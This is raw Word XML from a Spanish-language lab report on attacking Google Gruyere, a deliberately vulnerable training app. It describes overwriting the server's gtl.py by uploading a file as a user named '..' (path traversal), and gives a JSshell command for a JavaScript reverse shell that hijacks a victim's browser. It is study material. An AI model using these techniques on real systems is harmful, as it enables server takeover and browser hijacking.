          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="118ECBBA" w14:textId="2E4A477D" w:rsidR="0007255E" w:rsidRDefault="0007255E" w:rsidP="000739B1">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0007255E">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23A404BC" wp14:editId="42EA183D">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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00040" cy="5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FC0766" w14:textId="481C2725" w:rsidR="0007255E" w:rsidRDefault="00D822C5" w:rsidP="000739B1">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>Este es el mensaje del servidor:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523C04B3" w14:textId="638D18C6" w:rsidR="00D822C5" w:rsidRDefault="00D822C5" w:rsidP="000739B1">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36FC444A" w14:textId="53DEF33A" w:rsidR="00D822C5" w:rsidRDefault="00D822C5" w:rsidP="000739B1">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D822C5">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B25DF40" wp14:editId="371F2CC1">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="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5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A36EE9A" w14:textId="386CB201" w:rsidR="0007255E" w:rsidRDefault="00F0159E" w:rsidP="000739B1">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>Ahora devuelvo el archivo a su normalidad para corregir esto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF5991F" w14:textId="34FFFC0D" w:rsidR="006B1CB1" w:rsidRDefault="006B1CB1" w:rsidP="000739B1">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B7544A1" w14:textId="3CD6C063" w:rsidR="006B1CB1" w:rsidRDefault="006B1CB1" w:rsidP="000739B1">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="159F5F06" w14:textId="4E3545E1" w:rsidR="006B1CB1" w:rsidRDefault="006B1CB1">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="61" w:name="_Toc128034172"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="009758B1">
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>ode execution</w:t>
      </w:r>
      <w:bookmarkEnd w:id="61"/>
    </w:p>
    <w:p w14:paraId="202DBBEB" w14:textId="158EEF9E" w:rsidR="006B1CB1" w:rsidRDefault="006B1CB1" w:rsidP="006B1CB1">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="278B35F0" w14:textId="0696EB76" w:rsidR="006B1CB1" w:rsidRDefault="006B1CB1" w:rsidP="006B1CB1">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>La ide aquí es aprovechar vulnerabilidades para atacar la in</w:t>
      </w:r>
      <w:r w:rsidR="009A3A3D">
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>fraestructura</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> de Gruyere. El lenguaje de plantilla GTL, es un objetivo de elección, ya  GTL está dando forma a todo el sitio web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67222D7C" w14:textId="5F2E963A" w:rsidR="006B1CB1" w:rsidRDefault="006B1CB1" w:rsidP="006B1CB1">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Modificar el lenguaje GTL puede alterar </w:t>
      </w:r>
      <w:r w:rsidR="009A3A3D">
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>permanentemente</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> el sito y pagarlo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E074EB" w14:textId="7040C6ED" w:rsidR="006B1CB1" w:rsidRDefault="006B1CB1" w:rsidP="006B1CB1">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>Aprovecharemos este ataque usando DoS y Path Transversal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001C53BC" w14:textId="5AAF6FE4" w:rsidR="006B1CB1" w:rsidRDefault="006B1CB1" w:rsidP="006B1CB1">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Por lo </w:t>
      </w:r>
      <w:r w:rsidR="00B726BB">
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>tanto,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> vamos a remplazar el archivo ‘gtl.py’ con el nuestro y reescribir la infraestructura del sitio y, por lo </w:t>
      </w:r>
      <w:r w:rsidR="00B726BB">
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>tanto,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> poseer la aplicación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FD49B7" w14:textId="15969F9C" w:rsidR="006B1CB1" w:rsidRPr="006B1CB1" w:rsidRDefault="006B1CB1" w:rsidP="006B1CB1">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Lo primero que vamos </w:t>
      </w:r>
      <w:r w:rsidR="00B726BB">
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> hacer es crear un usuario llamado ‘..’ con contraseña ‘..’</w:t>
      </w:r>
      <w:r w:rsidR="008D2084">
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EE6119" w14:textId="3678CF7D" w:rsidR="00417B66" w:rsidRDefault="004426B5" w:rsidP="000739B1">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004426B5">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53BCC374" wp14:editId="71CFB354">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="273" name="Imagen 2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descr="Interfaz de usuario gráfica, Texto, Aplicación&#10;&#10;Descripción generada automáticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId273"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5726C439" w14:textId="0542A271" w:rsidR="008D2084" w:rsidRDefault="008D2084" w:rsidP="000739B1">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="685E7375" w14:textId="450F5CC6" w:rsidR="008D2084" w:rsidRDefault="008D2084" w:rsidP="003B778F">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>Y ahora iniciaremos sesión:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7966E913" w14:textId="7C08733D" w:rsidR="003B778F" w:rsidRDefault="003B778F" w:rsidP="003B778F">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B39D661" w14:textId="09D20818" w:rsidR="003B778F" w:rsidRDefault="004426B5" w:rsidP="003B778F">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004426B5">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="598D419B" wp14:editId="7E52A0A4">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="274" name="Imagen 2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n 274" descr="Interfaz de usuario gráfica, Texto, Aplicación&#10;&#10;Descripción generada automáticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId274"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5857CB" w14:textId="6E2CB4F9" w:rsidR="003B778F" w:rsidRDefault="003B778F" w:rsidP="003B778F">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4427B76F" w14:textId="70106805" w:rsidR="003B778F" w:rsidRDefault="003B778F" w:rsidP="003B778F">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>Ahora crearé el archivo ‘gtl.py’</w:t>
      </w:r>
      <w:r w:rsidR="001A7ED9">
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40738CAA" w14:textId="37AC2BE2" w:rsidR="001A7ED9" w:rsidRDefault="001A7ED9" w:rsidP="003B778F">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A7ED9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F32B48E" wp14:editId="3A10F5A2">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="271" name="Imagen 27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Captura de pantalla de computadora&#10;&#10;Descripción generada automáticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId275"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="631C4362" w14:textId="6615600C" w:rsidR="001A7ED9" w:rsidRDefault="001A7ED9" w:rsidP="003B778F">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>Ahora subiré el archivo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D129EEC" w14:textId="48A0DE7C" w:rsidR="001A7ED9" w:rsidRDefault="004426B5" w:rsidP="003B778F">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004426B5">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E841ACE" wp14:editId="5013272C">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="275" name="Imagen 27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275" descr="Interfaz de usuario gráfica, Texto, Aplicación, Chat o mensaje de texto&#10;&#10;Descripción generada automáticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId276"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="74917DB5" w14:textId="77777777" w:rsidR="001A7ED9" w:rsidRDefault="001A7ED9" w:rsidP="003B778F">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77BE7DBB" w14:textId="61EA6B76" w:rsidR="001A7ED9" w:rsidRDefault="001A7ED9" w:rsidP="003B778F">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="792989DF" w14:textId="01B49394" w:rsidR="001A7ED9" w:rsidRDefault="004426B5" w:rsidP="004426B5">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Al crear este usuario, aprovecho un error y lo que hago al subir el archivo es que se suba en la carpeta donde </w:t>
      </w:r>
      <w:r w:rsidR="00B726BB">
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>está</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> el archivo real ‘gtl.py’, con lo cual lo sobrescribo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3318D6" w14:textId="0EAAF863" w:rsidR="004426B5" w:rsidRDefault="002F2712" w:rsidP="004426B5">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F2712">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69378805" wp14:editId="399E72E8">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="277" name="Imagen 2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Interfaz de usuario gráfica, Aplicación&#10;&#10;Descripción generada automáticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId277"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5007BA17" w14:textId="78B2A17B" w:rsidR="002F2712" w:rsidRDefault="003B1256" w:rsidP="004426B5">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Con esto podemos modificar cualquier fichero </w:t>
      </w:r>
      <w:r w:rsidR="00B726BB">
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>del</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> servidor y modificar su código base, con lo cual podríamos hacer lo que quisiéramos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638FE4F7" w14:textId="5FB257E2" w:rsidR="00226EFA" w:rsidRDefault="00226EFA" w:rsidP="004426B5">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Con esto </w:t>
      </w:r>
      <w:r w:rsidR="0066264C">
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>conseguimos</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> modificar el código del servidor</w:t>
      </w:r>
      <w:r w:rsidR="0066264C">
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> y denegar el servicio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E2606D" w14:textId="229A21F2" w:rsidR="00284063" w:rsidRDefault="00284063" w:rsidP="00382933">
      <w:pPr>
        <w:ind w:left="1416" w:hanging="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E150D6B" w14:textId="3720AED2" w:rsidR="00284063" w:rsidRDefault="00284063">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="_Toc128034173"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>XSS to RCE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>
    </w:p>
    <w:p w14:paraId="7BDF843A" w14:textId="409D974E" w:rsidR="00284063" w:rsidRDefault="00284063" w:rsidP="00284063">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78C25BCE" w14:textId="5200C9FB" w:rsidR="006D4478" w:rsidRDefault="006D4478">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="63" w:name="_Toc128034174"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>Forma 1 -&gt;</w:t>
      </w:r>
      <w:bookmarkEnd w:id="63"/>
    </w:p>
    <w:p w14:paraId="03518DA3" w14:textId="77777777" w:rsidR="00CE41A8" w:rsidRPr="00CE41A8" w:rsidRDefault="00CE41A8" w:rsidP="00CE41A8">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F28499E" w14:textId="46002030" w:rsidR="00284063" w:rsidRDefault="00284063" w:rsidP="00284063">
      <w:pPr>
        <w:ind w:left="709"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>En este caso</w:t>
      </w:r>
      <w:r w:rsidR="006421C5">
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> mediante un ataque XSS llegaremos a conseguir un Shell de JavaScript, es decir secuestraremos el navegador de la víctima.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA28813" w14:textId="36776957" w:rsidR="006421C5" w:rsidRDefault="00A357A5" w:rsidP="00284063">
      <w:pPr>
        <w:ind w:left="709"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>Lo primero que voy a hacer es instalar bajarme este script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E10F617" w14:textId="124E680C" w:rsidR="00A357A5" w:rsidRDefault="00000000" w:rsidP="00284063">
      <w:pPr>
        <w:ind w:left="709"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId278" w:history="1">
        <w:r w:rsidR="00A357A5" w:rsidRPr="0060171F">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:t>https://github.com/shelld3v/JSshell</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="662A0DD5" w14:textId="32272215" w:rsidR="00A357A5" w:rsidRDefault="00A357A5" w:rsidP="00284063">
      <w:pPr>
        <w:ind w:left="709"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>Después de hacer esto usaremos es script para crear una Shell reversa con JavaScript, el comando será este:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF399E0" w14:textId="13EAD1BB" w:rsidR="00A357A5" w:rsidRPr="00284063" w:rsidRDefault="00A357A5" w:rsidP="00284063">
      <w:pPr>
        <w:ind w:left="709"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>Js</w:t>
      </w:r>
      <w:r w:rsidR="00143A9A">
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>.py -g -p 5000 -s 192.158.1.148 -w 200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678AB165" w14:textId="49A5BB67" w:rsidR="008D2084" w:rsidRDefault="00A357A5" w:rsidP="000739B1">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>-g: generará el paiload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761341FF" w14:textId="27AA12F8" w:rsidR="00A357A5" w:rsidRDefault="00A357A5" w:rsidP="000739B1">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>-p el puerto donde va a escuchar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A66D30" w14:textId="619F0038" w:rsidR="00A357A5" w:rsidRDefault="00A357A5" w:rsidP="000739B1">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">-s: la IP que </w:t>
      </w:r>
      <w:r w:rsidR="00784309">
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>va a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> usar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21658901" w14:textId="2AA7ED23" w:rsidR="00A357A5" w:rsidRDefault="00A357A5" w:rsidP="000739B1">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
